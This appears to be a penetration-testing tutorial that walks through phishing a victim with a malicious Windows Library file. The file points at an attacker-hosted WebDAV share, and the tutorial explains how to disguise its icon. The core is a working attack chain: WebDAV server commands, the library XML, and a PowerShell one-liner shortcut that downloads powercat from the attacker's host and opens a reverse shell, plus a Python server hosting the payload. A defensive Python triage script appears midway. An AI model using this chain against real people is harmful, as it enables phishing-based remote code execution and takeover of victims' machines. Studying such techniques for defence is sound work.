Windows Library Files

Windows Library Files are virtual containers used to connect users with data located in remote locations like web services or SMB shares.

Windows Library Files have a .Library-ms extension and are opened by double-clicking on them.

WebDAV

In order to share our malicious Windows Library file with the victim, we will create a WebDAV share to host the staged payload.

Start WebDAV Server

──(env)─(kali㉿kali)-[~/web]
└─$ /home/kali/env/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/web/

Create Windows Library File

We will create a new file on our Windows host and name it "dog.Library-ms".

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.119.5</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Right now the icon is a little suspicious, so let's change it to something else, like a photo.

Customizing Library File

Change Icon

<iconReference>imageres.dll, -1003</iconReference>

Testing & Fixing Serialization

We can test to see if it's working by double-clicking our "dog" icon on the desktop.

As we can see, our malicious Windows Library works, listing our WebDAV server!

Re-open Visual Studio Code

If we re-open "dog", we can see that the code has been changed. This happens because Windows tries to optimize the WebDAV communication with the client. So before we ship it off to the victim, we have to make sure that we've fixed it and NOT OPENED it on our end.

Delete the serialized tag and fix the url tag with:

<url>http://192.168.119.2</url>
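For mail-gateway or endpoint triage, the same structure can be inspected without opening the file in Explorer. The following is an added example, not part of the original page: it parses a .Library-ms file, reports every location that points at a remote host, and notes whether a serialized tag is present, meaning the file has already been opened somewhere. The function names, the sample XML with its 192.0.2.10 address, and the position of the serialized tag inside the sample are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace used by the library file format shown on this page.
NS = {"l": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample: same structure as the page's file, documentation-range
# address, plus the <serialized> tag Windows adds once the file is opened.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>http://192.0.2.10</url>
        <serialized>AAAA</serialized>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


def is_remote(url: str) -> bool:
    """True for locations that make Explorer reach out over the network."""
    if url.startswith("\\\\"):  # UNC path such as \\host\share
        return True
    parsed = urlparse(url)
    if parsed.scheme.lower() in {"http", "https"}:
        return True
    return parsed.scheme.lower() == "file" and bool(parsed.netloc)


def triage_library(data: bytes) -> dict:
    """Collect remote locations and the opened-state marker from a .library-ms."""
    root = ET.fromstring(data)  # for untrusted bulk input, prefer defusedxml
    result = {"remote": [], "other": [], "serialized": False}
    # The tag may sit anywhere in the tree, so search the whole document.
    result["serialized"] = root.find(".//l:serialized", NS) is not None
    for loc in root.iterfind(".//l:searchConnectorDescription/l:simpleLocation", NS):
        url = loc.findtext("l:url", default="", namespaces=NS).strip()
        if url:
            result["remote" if is_remote(url) else "other"].append(url)
    return result


if __name__ == "__main__":
    print(triage_library(SAMPLE))
```

A library file arriving by e-mail or download with any entry under "remote" deserves review before a user double-clicks it.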

Create Shortcut

We will create a shortcut on the Desktop. This shortcut will download powercat and open a reverse shell. Right-click the Desktop, select New > Shortcut, and add the following:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.5:8000/powercat.ps1'); powercat -c 192.168.119.5 -p 4444 -e powershell"

Start Web Server

We will create a Python web server to serve the powercat script.

kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

kali@kali:~/beyond$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
